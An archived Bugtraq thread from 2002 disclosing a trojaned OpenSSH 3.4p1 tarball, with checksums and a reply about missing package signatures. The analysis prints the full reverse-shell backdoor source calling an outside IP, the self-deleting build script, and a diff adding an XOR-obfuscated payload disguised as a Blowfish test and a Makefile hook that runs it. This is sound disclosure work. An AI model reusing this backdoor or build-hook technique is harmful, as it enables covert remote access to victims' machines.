8799802 2002-08-01 13:20 +0200 /53 lines/ Mikael Olsson <mikael.olsson@clavister.com>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 15:40 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23430>
Subject: openssh-3.4p1.tar.gz distribution recently trojaned
------------------------------------------------------------
From: Mikael Olsson <mikael.olsson@clavister.com>
To: bugtraq@securityfocus.com
Message-ID: <3D49198F.8613D352@clavister.com>

From http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org (and probably all its mirrors now) is trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to deraadt@openbsd.org and via irc.openprojects.org/#openbsd).

The changed files are:

openssh-3.4p1/openbsd-compat/Makefile.in:

    all: libopenbsd-compat.a
    +	@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c [1] is nothing more than a wrapper which generates a shell script [2] which compiles itself and tries to connect to a server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:

    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:

    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

-- 
Edwin Groothuis      |  Personal website: http://www.MavEtJu.org
edwin@mavetju.org    |  Weblog: http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   |  Interested in MUDs? http://www.FatalDimensions.org/

(8799802) /Mikael Olsson <mikael.olsson@clavister.com>/(Rewrapped)

8799826 2002-08-01 14:17 +0200 /479 lines/ Christian Bahls <christian.bahls@stud.uni-rostock.de>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 15:43 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External copy recipient: Christian Bahls <christian.bahls@stud.uni-rostock.de>
External replies to: christian.bahls@stud.uni-rostock.de
Recipient: Bugtraq (import) <23431>
Subject: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Christian Bahls <christian.bahls@stud.uni-rostock.de>
To: bugtraq@securityfocus.com
Cc: Christian Bahls <christian.bahls@stud.uni-rostock.de>
Message-ID: <Pine.BSO.4.44.0208011309080.17007-100000@wh5041.stw.uni-rostock.de>

[ i am not subscribed to bugtraq .. so if you reply please include me in the cc ]

i did an analysis on the trojan horse that was hidden in the recent portable version of openssh (3.4p1). it could be found (and still can be) on ftp.openbsd.org and its mirrors.

in openssh-3.4p1/openbsd-compat a c-file "bf-test.c" has been added. it tells you it has to check for correct handling in HP-UX PL.2 systems .. which is in fact 100% rubbish [PL.1 has been horrible .. so what could PL.2 be? :-]

in openssh-3.4p1/openbsd-compat "Makefile.in" has been edited to respect these changes when running make.

"bf-test.c" compiles to a program which has a shell script as output. the shell script outputs a c program and tries really hard to get it compiled .. and run. the c program connects to a computer in australia (203.62.158.32) and starts a shell locally if asked by the other computer.

[ i have not started this program .. but the server seems to have closed port 6667 (could be a firewall in between though) {this computer probably has been attacked beforehand} ]

in my opinion this is a really serious attack .. as i have to say:

1.) i do not often check signatures on packets i install
1.a) especially i wouldn't have thought about the possibility that someone might be able to get access to ftp.openbsd.org (ok this is a sun-os machine at the university of alberta)
2.) i normally run make on a computer reachable by the net
3.) sometimes one is lazy and just runs make && make install as root

you will find all the more interesting stuff below this signature:

yours
christian bahls

math-student
university of rostock

>> "there she goes .. 
" ####### # the c-programm # [made readable by my favourite indentation program] # {all comments are by me} ####### #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env; int s; /* * i_val evaluates to /bin/sh */ char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68"; /* * this is a signal-handler routine * it catches SIGALARM .. closes the socket * and waits for 1 hour and than trys again */ void sig(int sig) { close(s); sleep(3600); longjmp(env, 0); } int main() { int x; char c, *a[2]; struct sockaddr_in sa; struct sigaction act; /* * fork() and continue as background process */ switch (fork()) { case 0: break; default: exit(0); } /* * daemonize a bit (still associated to the same session) */ close(0); close(1); close(2); /* * setup signal handler routines */ memset(&act, 0, sizeof(act)); act.sa_handler = sig; sigaction(SIGALRM, &act, NULL); do { /* * this is where we a going to return after 1h * if we have to retry */ setjmp(env); /* * set up a socket * connect to 203.62.158.32 port 6667 * no this program is not going to do irc */ if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) exit(1); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(6667); sa.sin_addr.s_addr = inet_addr("203.62.158.32"); /* * give it 10 seconds to connect * otherwise start over(1h retry time) * if error occurs .. just die */ alarm(10); if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1)) exit(1); /* * read one char from socket * die if something goes wrong */ if ((x = read(s, &c, 1)) == (-1)) { exit(1); } else if (x == 1) { switch (c) { case 'A': /* we got an 'A' .. just exit() */ exit(0); case 'D': /* we got an 'D' .. set off the * alarm() make the socket * stdin/stdout/stderr .. start a * shell .. 
finish if it * finishes(execve() behavoir) */ alarm(0); dup2(s, 0); dup2(s, 1); dup2(s, 2); a[0] = i_val; a[1] = NULL; execve(a[0], a, NULL); break; case 'M': /* just retry */ alarm(0); sig(0); break; default: } } else { exit(0); } /* * just loop forever */ } while (1); } ##### # Output of bf-test: ##### >>>SNIPP #!/bin/sh cat >conftest.c <<_ACEOF #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig(int sig){close(s);sleep(3600);longjmp(env,0);}int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);memset(&act,0,sizeof(act));act.sa_handler=sig;sigaction(SIGALRM,&act,NULL);do{setjmp(env);if((s=socket(AF_INET,SOCK_STREAM,0))==(-1))exit(1);memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");alarm(10);if(connect(s,(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1);if((x=read(s,&c,1))==(-1)){exit(1);}else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2);a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;case 'M':alarm(0);sig(0);break;default:}}else{exit(0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! 
test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1 # testing in raw ecb mode <<<SNAPP ###### # diff of different versions .. # one is the trojan .. ###### diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in trojan/openssh-3.4p1/openbsd-compat/Makefile.in --- non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in Tue Feb 19 21:27:57 2002 +++ trojan/openssh-3.4p1/openbsd-compat/Makefile.in Wed Jan 31 22:52:03 2001 @@ -26,6 +26,7 @@ $(CC) $(CFLAGS) $(CPPFLAGS) -c $< all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & $(COMPAT): ../config.h $(OPENBSD): ../config.h diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c trojan/openssh-3.4p1/openbsd-compat/bf-test.c --- non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c Thu Jan 1 01:00:00 1970 +++ trojan/openssh-3.4p1/openbsd-compat/bf-test.c Wed Jan 31 22:52:03 2001 
@@ -0,0 +1,251 @@ +/* + * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems. + * Perform routine compatability checks. + */ +#include <stdio.h> + +#define KEY_TEST_NUM 25 +static unsigned char key_test[KEY_TEST_NUM]={ + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87, + 0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f, + 0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77, + 0x88}; + +/* DES cbc input vectors */ +static unsigned char ecb_data[]={ + + 0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c, + 0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c, + 0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60, + 0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25, + 0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c, + 0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11, + 0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b, + 0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41, + 0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c, + 0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c, + 0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01, + 0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b, + 0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47, + 0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f, + 0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c, + 0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12, + 0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57, + 0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73, + 0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40, + 0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f, + 
0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07, + 0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19, + 0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f, + 0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41, + 0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41, + 0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03, + 0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70, + 0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e, + 0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14, + 0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a, + 0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e, + 0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14, + 0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b, + 0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e, + 0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e, + 0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46, + 0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e, + 0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40, + 0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59, + 0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c, + 0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e, + 0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06, + 0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a, + 0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03, + 0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06, + 0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42, + 0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d, + 0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19, + 0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e, + 0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12, + 0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d, + 0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01, + 0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07, + 0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41, + 0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a, + 0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d, + 0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40, + 0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e, + 0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46, + 0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c, + 0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02, + 0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06, + 0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57, + 0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e, + 0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c, + 0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e, + 0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07, + 0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c, + 0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03, + 0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59, + 0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63, + 0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74, + 0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14, + 0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f, + 0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f, + 0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d, + 0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b, + 0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43, + 
0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a, + 0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59, + 0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b, + 0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46, + 0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14, + 0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62, + 0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f, + 0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40, + 0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f, + 0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49, + 0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49, + 0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02, + 0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f, + 0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d, + 0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a, + 0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c, + 0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46, + 0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d, + 0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25, + 0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49, + 0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b, + 0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68, + 0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a, + 0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c, + 0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c, + 
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09, + 0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c, + 0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a, + 0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44, + 0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14, + 0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e, + 0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60, + 0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b, + 0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f, + 0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25, + 0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b, + 0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41, + 0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f, + 0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f, + 0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b, + 0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 
0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00, + 0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11, + 0x09,0x1e,0x25,0x00}; + +/* big endian */ +static unsigned long bfplain[2][2]={ + {0x424c4f57L,0x46495348L}, + {0xfedcba98L,0x76543210L} + }; + +static unsigned long bfcipher[2][2]={ + {0x324ed0feL,0xf413a203L}, + {0xcc91732bL,0x8022f684L} + }; + + +static unsigned char ocb_data[]={ + 0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b, + 0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20, + 0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28, + 0x00}; + +static unsigned char cbc_key [16]={ + 0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef, + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87}; + +static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10}; + +#if defined(WIN16) || defined(__LP32__) +#elif defined(_CRAY) || defined(__ILP64__) +/* + * _CRAY note. I could declare short, but I have no idea what impact + * does it have on performance on none-T3E machines. I could declare + * int, but at least on C90 sizeof(int) can be chosen at compile time. + * So I've chosen long... 
+ * <appro@fy.chalmers.se> + */ +#else +#endif + +main(void) +{ + int i, n, err; + unsigned char cbc_in[40],cbc_out[40],iv[8]; + + dup2(1, 2); +#ifdef CHARSET_EPCDIC + epcdic2ascii(ecb_data, strlen(ecb_data)); +#endif + + printf("# testing in raw ecb mode\n"); + + n=0; + if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (err) + { + for (i = 0; i < sizeof(ecb_data)-1; i++) + fprintf(stderr, "%c", ecb_data[i] ^ 47); + } +return(0); +}

(8799826) /Christian Bahls <christian.bahls@stud.uni-rostock.de>/(Rewrapped)
Comment in text 8799863
Comment in text 8802039 by Jim Breton <jamesb-bugtraq@alongtheway.com>

8802039 2002-08-01 18:45 +0000 /29 lines/ Jim Breton <jamesb-bugtraq@alongtheway.com>
Sent by: joel@lysator.liu.se
Imported: 2002-08-02 00:33 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23459>
Comment on text 8799826 by Christian Bahls <christian.bahls@stud.uni-rostock.de>
Subject: Re: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Jim Breton <jamesb-bugtraq@alongtheway.com>
To: bugtraq@securityfocus.com
Message-ID: <20020801184534460715.G1299@alongtheway.com>

On Thu, Aug 01, 2002 at 02:17:36PM +0200, Christian Bahls wrote:
> 1.) i do not often check signatures an packets i install

Particularly difficult when there _are no_ signatures available for the package you want to install (in this case, the non-"portable" tarballs). AFAIK there have never been signatures available for the OpenBSD tarballs. At least none that I've seen on the FTP server. I hope this will change soon...?

